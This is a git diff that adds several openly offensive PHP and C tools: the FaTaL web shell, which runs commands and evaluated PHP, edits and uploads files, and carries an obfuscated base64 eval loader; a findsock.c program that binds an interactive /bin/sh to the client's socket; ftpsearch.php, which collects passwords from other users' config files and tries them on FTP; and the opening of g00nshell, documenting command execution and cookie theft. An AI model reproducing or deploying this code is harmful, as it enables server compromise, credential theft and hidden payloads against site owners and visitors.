+(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
+(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
+$version='version 1.0 by FaTaLErrOr';
+$action=$_POST['action'];
+$file=$_POST['file'];
+$dir=$_POST['dir'];
+$content='';
+$stdata='';
+$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - FaTaL Shell v1.0 - Edited By KingDefacer</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1254">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==')); 
+$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==')); 
+$lang=array(
+'filext'=>'Plz rename or change the files name',
+'uploadok'=>'Uploaded sucsseesfuly',
+'dircrt'=>'Dir was created.',
+'dontlist'=>'Not ls, not permisson',
+'dircrterr'=>'Dont created, Not permission.',
+'dirnf'=>'Dir not found.',
+'filenf'=>'.',
+'dontwrdir'=>'Just can read',
+'empty'=>'Dir is empty or not permission.',
+'deletefileok'=>'FIle was deleted.',
+'deletedirok'=>'Dir was deleted.',
+'isdontfile'=>'Plz write full dir name. Like c:/program files/a.php ',
+'cantrfile'=>'Cant open the Dir. Not permission',
+'onlyracc'=>'Cant edited the file, just write permission is available.',
+'workdir'=>'Work Directory: ',
+'fullacc'=>'Full permission.',
+'fullaccdir'=>'You have full permission, you can delete or edit the files.',
+'thisnodir'=>'Choose the Dir',
+'allfuncsh'=>'Functions are disabled'
+);
+
+$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions
+
+function test_file($file){
+if(!file_exists($file))$err="1";
+elseif(!is_file($file)) $err="2";
+elseif(!is_readable($file))$err="3";
+elseif(!is_writable($file))$err="4"; else $err="5";
+return $err;}
+
+function test_dir($dir){
+if(!file_exists($dir))$err="1";
+elseif(!is_dir($dir)) $err="2";
+elseif(!is_readable($dir))$err="3";
+elseif(!is_writable($dir))$err="4"; else $err="5";
+return $err;}
+
+function perms($file){ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;} 
+
+function view_size($size){
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;}
+
+if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
+
+if(isset($dir)){
+  $ts['test']=test_dir($dir); 
+  switch($ts['test']){
+    case 1:$stdata.=$lang['dirnf'];break;
+    case 2:$stdata.=$lang['thisnodir'];break;
+    case 3:$stdata.=$lang['dontlist'];break;
+    case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
+    case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
+}else $dir=@chdir($dir);
+
+$dir=getcwd()."/";
+$dir=str_replace("\\","/",$dir);
+
+if(isset($file)){
+    $ts['test1']=test_file($file);
+  switch ($ts['test1']){
+    case 1:$stdata.=$lang['filenf'];break;
+	case 2:$stdata.=$lang['isdontfile'];break;
+	case 3:$stdata.=$lang['cantrfile'];break;
+	case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
+	case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
+}
+
+function shell($cmd)
+{
+  global $lang;
+ $ret = '';
+ if (!empty($cmd))
+ {
+  if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
+  elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
+  elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
+  else $ret=$lang['allfuncsh'];
+ }
+ return $ret;
+}
+
+function createdir($dir){mkdir($dir);}
+
+//delete file
+if($action=="delete"){ 
+if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk İçin Tıklayınız.</a>";
+}
+//delete dir
+if($action=="deletedir"){ 
+if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk İçin Tıklayınız.</a>";
+else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk İçin Tıklayınız.</a>";
+}
+//shell
+if($action=="shell"){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
+<input type=\"submit\" value=\"Uygula\"></form>";}
+//editor  
+if($action=="editor"){
+  $stdata.="<form method=POST>
+  <input type=\"hidden\" name=\"action\" value=\"editor\">
+  <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+  Dosyanın Adı (Full Url Yazın)<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\"Editle\"></form>";	  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+}
+  function readf($file){
+  clearstatcache();
+  $f=fopen($file, "r");
+  $contents = fread($f,filesize($file));
+  fclose($f);
+  return htmlspecialchars($contents);
+}
+if(@$_POST['save'])writef($file,$_POST['data']);
+if(@$_POST['create'])writef($file,"");
+$test=test_file($file);
+if($test==1){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
+<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
+<input type=\"reset\" value=\"No\"></form>";
+}
+if($test>2){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"Kaydet\"><input type=\"reset\" value=\"Reset\"></form>";
+}}
+//viewer
+if($action=="viewer"){
+$content.="<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+$content.="<tr><td><form method=POST>Klasore Git:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"Git\"></form></td></tr>";
+  if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		if ($GLOBALS['os']==1) {
+		  $content.="<tr><td>HDD Secin:";
+		  for ($j=ord('C'); $j<=ord('Z'); $j++) 
+		   if (@$dh = opendir(chr($j).":/"))
+		   $content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+		   $content.="</td></tr>";
+		 }
+		$content.="<tr><td>Sistem: ".@php_uname()."</td></tr><tr><td></td><td>Type</td><td>Size</td><td>Permission</td><td>Choose</td></tr>";
+		for($i=0;$i<count($dire);$i++) {
+		  $link=$dir.$dire[$i];
+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>Dir</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Delete the Dir">X</a></td></tr>';  
+		}
+		for($i=0;$i<count($files);$i++) {
+		  $linkfile=$dir.$files[$i];
+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>File</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Delete">X</a></td></tr>'; 
+		}
+		$content.="</table>";
+}}}
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);}
+//phpeval
+if($action=="phpeval"){
+$content.="<form method=\"POST\">
+ <input type=\"hidden\" name=\"action\" value=\"phpeval\">
+ <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+ &lt;?php<br>
+ <textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
+ ?><br>
+ <input type=\"submit\" value=\"Uygula\"></form>";
+if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
+//upload
+if($action=="upload"){
+  if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
+  $form_win="<tr><td><form method=POST enctype=multipart/form-data>
+  <input type=\"hidden\" name=\"action\" value=\"upload\">  
+  Buraya Uploadla:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>Dosyayı Adlandır (Gerekli) :<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload Et'></td></tr>";
+  if($os==1)$content.=$form_win;
+  if($os==0){
+    $content.=$form_win;
+	$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
+<input type=submit name=upload value=Upload></form></td></tr>';	
+}
+
+if(isset($_POST['uploadloc'])){
+if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
+$uploadfile = $dirupload."/".$_POST['filename'];
+
+if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
+if(file_exists($uploadfile))$content.=$lang['filext']; 
+elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
+$content.=$lang['uploadok'];
+}
+
+if(isset($_POST['upload'])){
+    if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
+	switch($_POST['with'])
+	{case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break; case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break; case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break; case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;}}}?> 
+	<?=$header;?><style type="text/css">
+<!--
+.style4 {
+	font-size: x-large;
+	font-weight: bold;
+}
+.style5 {color: #FF0000}
+.style8 {color: #CCFF00}
+-->
+</style>
+<a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();"><p align="center" class="style4">FaTaLSheLL v1.0 Edited By KingDefacer</p></a>
+<table width="100%" bgcolor="#336600" align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td>
+<a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>';
+ document.reqs.submit();">| Shell </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';
+ document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();
+ ">
+ | Main Page</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';
+ document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">
+ | Edit File</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>';
+ document.reqs.submit();">| Upload File</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';
+ document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Php Eval |</a></td><td><a href="#" onclick="history.back();">
+ <-Back |</a></td><td><a href="#" onclick="history.forward();"> Next->|</a></td></tr></table></td></tr></table><br>
+ <form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''> <input name='file' type='hidden' value=''></form>
+<p>&nbsp;</p>
+<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%"
+ bgColor=#333333 borderColorLight="#c0c0c0" border=1> <tr><td><span class="style8">Safe mode:</span> 
+ <br>
+      <span class="style8">Disabled Functions:</span> <?php echo $disfunc;?><br>
+      <span class="style8">System:</span> <?php echo @php_uname();?><br>
+      <span class="style8">Case:</span> <?php echo @$stdata;?></td>
+
+	  </tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?></td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td>	  <a href="http://alturks.com">COPYRIGHT 2010 - Edited By KingDefacer <?=$version;?></a></td></tr></table></tr></td></table><?=$footer;?>
diff --git a/php/findsock.c b/php/findsock.c
new file mode 100644
index 0000000..71444f7
--- /dev/null
+++ b/php/findsock.c
@@ -0,0 +1,137 @@
+// php-findsock-shell - A Findsock Shell implementation in PHP + C
+// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
+//
+// This tool may be used for legal purposes only.  Users take full responsibility
+// for any actions performed using this tool.  The author accepts no liability
+// for damage caused by this tool.  If these terms are not acceptable to you, then
+// do not use this tool.
+//
+// In all other respects the GPL version 2 applies:
+//
+// This program is free software; you can redistribute it and/or modify
+// it under the terms of the GNU General Public License version 2 as
+// published by the Free Software Foundation.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License along
+// with this program; if not, write to the Free Software Foundation, Inc.,
+// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+//
+// You are encouraged to send comments, improvements or suggestions to
+// me at pentestmonkey@pentestmonkey.net
+//
+// Description
+// -----------
+// (Pair of) Web server scripts that find the TCP socket being used by the 
+// client to connect to the web server and attaches a shell to it.  This 
+// provides you, the pentester, with a fully interactive shell even if the 
+// Firewall is performing proper ingress and egress filtering.
+//
+// Proper interactive shells are more useful than web-based shell in some
+// circumstances, e.g:
+//  1: You want to change your user with "su"
+//  2: You want to upgrade your shell using a local exploit
+//  3: You want to log into another system using telnet / ssh
+//
+// Limitations
+// -----------
+// The shell traffic doesn't look much like HTTP, so I guess that you may
+// have problems if the site is being protected by a Layer 7 (Application layer) 
+// Firewall.
+//
+// The shell isn't fully implemented in PHP: you also need to upload a
+// C program.  You need to either:
+//  1: Compile the program for the appropriate OS / architecture then
+//     upload it; or
+//  2: Upload the source and hope there's a C compiler installed.
+//
+// This is a pain, but I couldn't figure out how to implement the findsock
+// mechanism in PHP.  Email me if you manage it.  I'd love to know.
+//
+// Only tested on x86 / amd64 Gentoo Linux.
+//
+// Usage
+// -----
+// See http://pentestmonkey.net/tools/php-findsock-shell if you get stuck.
+//
+// Here are some brief instructions.
+//
+// 1: Compile findsock.c for use on the target web server:
+//    $ gcc -o findsock findsock.c
+//
+//    Bear in mind that the web server might be running a different OS / architecture to you.
+//
+// 2: Upload "php-findsock-shell.php" and "findsock" binary to the web server using
+//    whichever upload vulnerability you've indentified.  Both should be uploaded to the 
+//    same directory.
+//
+// 3: Run the shell from a netcat session (NOT a browser - remember this is an
+//    interactive shell).
+//
+//    $ nc -v target 80
+//    target [10.0.0.1] 80 (http) open
+//    GET /php-findsock-shell.php HTTP/1.0
+//
+//    sh-3.2$ id
+//    uid=80(apache) gid=80(apache) groups=80(apache)
+//    sh-3.2$
+//    ... you now have an interactive shell ...
+//
+
+#include <sys/socket.h>
+#include <stdio.h>
+#include <string.h>
+#include <arpa/inet.h>
+#include <netinet/in.h>
+#include <unistd.h>
+
+int main (int argc, char** argv) {
+	// Usage message
+	if (argc != 3) {
+		printf("Usage: findsock ip port\n");
+		exit(0);
+	}
+
+	// Process args
+	char *sock_ip = argv[1];
+	char *sock_port = argv[2];
+
+	// Declarations
+	struct sockaddr_in rsa;
+	struct sockaddr_in lsa;
+	int size = sizeof(rsa);
+	char remote_ip[30];
+	int fd;
+
+	// Inspect all file handles
+	for (fd=3; fd<getdtablesize(); fd++) {
+
+		// Check if file handle is a socket
+		// If so, get remote IP and port
+		if (getpeername(fd, &rsa, &size) != -1) {
+			strncpy(remote_ip, inet_ntoa(*(struct in_addr *)&rsa.sin_addr.s_addr), 30);
+
+			// Check if IP for this socket match
+			// the socket we're trying to find.
+			if (strncmp(remote_ip, sock_ip, 30) == 0) {
+
+				// Check if Port for this socket match
+				// the socket we're trying to find.
+				if ((int)ntohs(rsa.sin_port) == (int)atoi(sock_port)) {
+
+					// Run command
+					setsid();
+					dup2(fd, 0);
+					dup2(fd, 1);
+					dup2(fd, 2);
+					close(fd);
+					execl("/bin/sh", "/bin/sh", "-i", NULL);
+				}
+			}
+		}
+	}
+}
diff --git a/php/ftpsearch.php b/php/ftpsearch.php
new file mode 100644
index 0000000..406f9c5
--- /dev/null
+++ b/php/ftpsearch.php
@@ -0,0 +1,102 @@
+<?php
+echo "<html>";
+echo "<title>Edited By KingDefacer</title><body>";
+
+set_time_limit(0);
+##################
+@$passwd=fopen('/etc/passwd','r');
+if (!$passwd) {
+  echo "[-] Error : coudn't read /etc/passwd";
+  exit;
+}
+$path_to_public=array();
+$users=array();
+$pathtoconf=array();
+$i=0;
+
+while(!feof($passwd)) {
+$str=fgets($passwd);
+if ($i>35) {
+   $pos=strpos($str,":");
+   $username=substr($str,0,$pos);
+   $dirz="/home/$username/public_html/";
+   if (($username!="")) {
+       if (is_readable($dirz)) {
+           array_push($users,$username);
+           array_push($path_to_public,$dirz);
+       }
+   }
+}
+$i++;
+}
+###################
+
+#########################
+echo "<br><br>";
+echo "<textarea name='main_window' cols=100 rows=20>";
+
+echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
+echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n";
+
+echo "[~] Searching for passwords in config.* files...\n\n";
+foreach ($users as $user) {
+       $path="/home/$user/public_html/";
+       read_dir($path,$user);
+}
+
+echo "\n[+] Done\n";
+
+function read_dir($path,$username) {
+   if ($handle = opendir($path)) {
+       while (false !== ($file = readdir($handle))) {
+             $fpath="$path$file";
+             if (($file!='.') and ($file!='..')) {
+                if (is_readable($fpath)) {
+                   $dr="$fpath/";
+                   if (is_dir($dr)) {
+                      read_dir($dr,$username);
+                   }
+                   else {
+                        if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { 
+                           $pass=get_pass($fpath);
+                           if ($pass!='') {
+                              echo "[+] $fpath\n$pass\n";
+                              ftp_check($username,$pass);
+                           }
+                        }
+                   }
+                }
+             }
+       }
+   }
+}
+
+function get_pass($link) {
+   @$config=fopen($link,'r');
+   while(!feof($config)) {
+       $line=fgets($config);
+       if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
+           if (strrpos($line,'"'))
+              $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
+           else
+              $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
+           return $pass;
+       }
+   }
+}
+
+function ftp_check($login,$pass) {
+    @$ftp=ftp_connect('127.0.0.1');
+    if ($ftp) {
+       @$res=ftp_login($ftp,$login,$pass);
+       if ($res) {
+          echo '[FTP] '.$login.':'.$pass."  Success\n";
+       }
+       else ftp_quit($ftp);
+    }
+}
+
+echo "</textarea><br>";
+
+echo "</body></html>";
+?>
diff --git a/php/g00nshell-v1.3.php b/php/g00nshell-v1.3.php
new file mode 100644
index 0000000..508b82e
--- /dev/null
+++ b/php/g00nshell-v1.3.php
@@ -0,0 +1,730 @@
+ <?php
+/*
+######################################################################
+# [g00n]FiSh presents: #
+# g00nshell v1.3 final #
+############################DOCUMENTATION#############################
+#To execute commands, simply include ?cmd=___ in the url. #
+#Ex: http://site.com/shl.php?cmd=whoami #
+# #
+#To steal cookies, use ?cookie=___ in the url. #
+#Ex: <script>document.location.href= #
+#'http://site.com/shl.php?cookie='+document.cookies</script> #
+##########################VERIFICATION LEVELS#########################
+#0: No protection; anyone can access #
+#1: User-Agent required #
+#2: Require IP #
+#3: Basic Authentication #
+##############################KNOWN BUGS##############################
+#Windows directory handling #
+# #
+#The SQL tool is NOT complete. There is currently no editing function#
+#available. Some time in the future this may be fixed, but for now #
+#don't complain to me about it #
+################################SHOUTS################################
+#pr0be - Beta testing & CSS #
+#TrinTiTTY - Beta testing #
+#clorox - Beta testing #
+#Everyone else at g00ns.net #
+########################NOTE TO ADMINISTRATORS########################
+#If this script has been found on your server without your approval, #
+#it would probably be wise to delete it and check your logs. #
+######################################################################
+*/
+error_reporting(0);
